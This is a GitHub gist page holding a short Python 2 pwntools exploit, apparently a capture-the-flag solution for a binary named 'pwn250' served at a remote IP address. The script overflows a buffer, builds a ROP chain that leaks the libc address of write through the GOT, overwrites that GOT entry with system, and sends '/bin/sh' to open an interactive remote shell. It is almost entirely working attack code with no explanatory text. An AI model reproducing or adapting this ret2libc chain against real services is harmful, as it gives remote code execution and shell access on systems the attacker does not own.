Skip to content

Instantly share code, notes, and snippets.

@becojo
Created July 30, 2017 21:11
Show Gist options
  • Save becojo/3eed14260b9ca9c4ce5bd0ca8d00850f to your computer and use it in GitHub Desktop.
Save becojo/3eed14260b9ca9c4ce5bd0ca8d00850f to your computer and use it in GitHub Desktop.
#!/usr/bin/env python2
from pwn import *
context.log_level = 'debug'
context.arch = 'amd64'
host = "54.153.19.139"
port = 5255
def loc():
return process("tee i | ./pwn250", shell=True)
def rem():
return remote(host, port)
p = rem()
payload = 'a' * (136 - 8) + 'R'*8
elf = ELF('./pwn250')
libc = ELF('libc.so') # elf.libc
rop = ROP(elf)
#leak libc write
rop.raw(0x40056a)
rop.raw(1)
rop.raw(elf.symbols['got.write'])
rop.raw(8)
rop.write()
# overwrite the got
rop.raw(0x40056a)
rop.raw(0)
rop.raw(elf.symbols['got.write'])
rop.raw(16)
rop.read()
# trigger system("/bin/sh")
rop.write(elf.symbols['got.write'] + 8)
print rop.dump()
payload += str(rop)
payload = payload[0:256]
p.send(payload)
got_write = u64(p.recvn(8))
libc_base = got_write - libc.symbols['write']
system_addr = libc_base + libc.symbols['system']
p.send(p64(system_addr) + "/bin/sh\x00")
p.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment